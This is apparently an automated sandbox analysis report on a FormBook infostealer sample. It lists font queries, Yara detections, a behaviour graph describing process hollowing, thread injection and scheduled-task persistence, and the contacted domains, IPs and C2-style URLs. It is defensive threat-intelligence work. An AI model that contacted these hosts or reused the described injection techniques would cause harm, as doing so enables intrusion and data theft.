Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.702411674.0000000001AF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.911335955.0000000000940000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.911866298.0000000002E00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.667772348.000000000436B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.701293612.0000000001780000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.700413913.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.702411674.0000000001AF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.911335955.0000000000940000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.911866298.0000000002E00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.667772348.000000000436B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.701293612.0000000001780000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.700413913.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 385317 Sample: YNzE2QUkvaTK7kd.exe Startdate: 12/04/2021 Architecture: WINDOWS Score: 100 41 www.lsertsex.com 2->41 49 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->49 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 10 other signatures 2->55 11 YNzE2QUkvaTK7kd.exe 7 2->11         started        signatures3 process4 file5 33 C:\Users\user\AppData\...\VVhTSSmjNa.exe, PE32 11->33 dropped 35 C:\Users\...\VVhTSSmjNa.exe:Zone.Identifier, ASCII 11->35 dropped 37 C:\Users\user\AppData\Local\Temp\tmp27F.tmp, XML 11->37 dropped 39 C:\Users\user\...\YNzE2QUkvaTK7kd.exe.log, ASCII 11->39 dropped 67 Uses schtasks.exe or at.exe to add and modify task schedules 11->67 69 Writes to foreign memory regions 11->69 71 Allocates memory in foreign processes 11->71 73 Injects a PE file into a foreign processes 11->73 15 RegSvcs.exe 11->15         started        18 schtasks.exe 1 11->18         started        signatures6 process7 signatures8 75 Modifies the context of a thread in another process (thread injection) 15->75 77 Maps a DLL or memory area into another process 15->77 79 Sample uses process hollowing technique 15->79 81 2 other signatures 15->81 20 explorer.exe 15->20 injected 24 conhost.exe 18->24         started        process9 dnsIp10 43 www.realsults.com 154.203.184.76, 49746, 80 HKMTC-AS-APHONGKONGMegalayerTechnologyCoLimitedHK Seychelles 20->43 45 www.wfiboostrs.com 172.67.148.14, 49757, 80 CLOUDFLARENETUS United States 20->45 47 192.168.2.1 unknown unknown 20->47 57 System process connects to network (likely due to code injection or exploit) 20->57 59 Uses ipconfig to lookup or modify the Windows network settings 20->59 26 ipconfig.exe 20->26         started        signatures11 process12 signatures13 61 Modifies the context of a thread in another process (thread injection) 26->61 63 Maps a DLL or memory area into another process 26->63 65 Tries to detect virtualization through RDTSC time measurements 26->65 29 cmd.exe 1 26->29         started        process14 process15 31 conhost.exe 29->31         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
154.203.184.76
 www.realsults.com Seychelles
139646 HKMTC-AS-APHONGKONGMegalayerTechnologyCoLimitedHK true
172.67.148.14
 www.wfiboostrs.com United States
13335 CLOUDFLARENETUS true

Private
IP
192.168.2.1

Contacted Domains

Name IP Active
www.lsertsex.com 103.120.82.56 true
www.realsults.com 154.203.184.76 true
www.wfiboostrs.com 172.67.148.14 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
www.smarttel.management/msc/ true
  • Avira URL Cloud: safe
 low
http://www.wfiboostrs.com/msc/?2d=Yn6xWrc8&6lXXDHeh=Vmyb2+dBHu0Fxfg/5qCzMPkyVQF1W5lD3/EJu1ZP6IBNOOXVlqQnUzqXVgG8rpdGNrLT true
  • Avira URL Cloud: safe
 unknown
http://www.realsults.com/msc/?2d=Yn6xWrc8&6lXXDHeh=SLnxv5WEj6Yhjlrb8B4FzKU74ag+VtkikWCAHb2VKlwGrAtgyss6rL13pKH+jHoocxko true
  • Avira URL Cloud: safe
 unknown